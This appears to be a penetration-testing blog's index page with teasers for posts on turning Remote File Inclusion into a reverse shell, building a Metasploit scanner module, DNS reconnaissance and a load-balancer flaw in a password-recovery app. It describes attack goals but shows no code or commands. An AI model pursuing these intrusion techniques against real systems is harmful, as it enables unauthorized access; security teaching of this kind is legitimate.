From RFI to Shell

Remote File Inclusion (RFI) is a web application vulnerability attackers exploit to run malicious code. Depending on the web server configuration, an attacker may tell the web app to include code from a file hosted on a remote server. In this post, I’ll describe how to exploit RFI to get a reverse shell on the target using two methods. The first will only use tools already on the victim, while the second will use the more feature-rich metasploit method.

Continue reading From RFI to Shell

How To Create a Metasploit Module

Today I want to review how to create a metasploit module.  This process was entirely new to me, so I decided to start from scratch, using the Metasploit Unleashed site as a guide.  My aim was to create an auxiliary scanner to look for Dropbox listeners running on the default ports of TCP/17500 and UDP/17500.  I use Kali Linux, so all of my examples will reflect such.

Continue reading How To Create a Metasploit Module

DNS Recon

The Domain Name System is crucial for human interaction with networks.  Gathering information about a target is critical to performing a successful penetration test, and the DNS service is one of the key sources of this information.  Today, I want to write about the different types of information that can be discovered by probing this service using a mix of command line tools and web resources.  There are many tools available to interact with DNS, but today I’m going to cover the use of nslookup, host, and *dig *on the command line, and the netcraft website.

Continue reading DNS Recon

Load Balancer Fail

On a recent engagement, I discovered a huge fail in the assumptions made during the implementation of a web application. The application in question manages user password recovery and is hosted on Windows IIS.  The implementation I evaluated made use of load balancing due to the number of user requests per hour. This application can hook into Active Directory authentication for user access to the various administrative functions provided by the application.

Continue reading Load Balancer Fail